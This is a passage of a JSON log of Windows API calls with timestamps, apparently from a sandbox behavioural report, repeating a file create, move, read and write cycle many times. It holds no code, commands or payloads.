"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,422", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,432", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,432", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,432", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,442", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,442", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,452", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,452", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,452", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,462", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,462", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,472", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,472", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,472", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,482", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,482", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,482", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,482", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,482", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,482", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,482", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,482", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,482", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,492", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,492", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,492", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,502", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,502", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,502", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,502", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,502", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,502", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,502", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,512", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,512", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,512", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,512", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,512", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,512", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,512", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,512", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,522", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,522", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,522", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,522", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,522", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,522", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,522", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,522", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,532", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,532", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,532", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,532", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,532", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,542", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,542", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,542", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,542", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,542", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,542", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,542", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,562", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,572", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,572", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,572", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,572", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,572", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,572", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,572", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,572", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,582", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,582", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,582", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,592", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,592", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,592", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,592", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,592", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,592", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,592", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,592", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,592", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,602", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,602", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,602", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,612", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,612", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,622", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,622", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,622", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,632", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,632", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,642", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,642", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,642", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,652", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,652", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,662", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,662", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,662", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,662", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,662", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,662", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,662", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,662", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,662", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,672", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,672", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,672", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,682", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,682", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,682", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,682", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,682", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,682", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,682", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,682", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,682", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,692", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,692", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,702", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,702", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,712", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,712", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,722", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,722", "api": "NtFreeVirtualMemory"}, 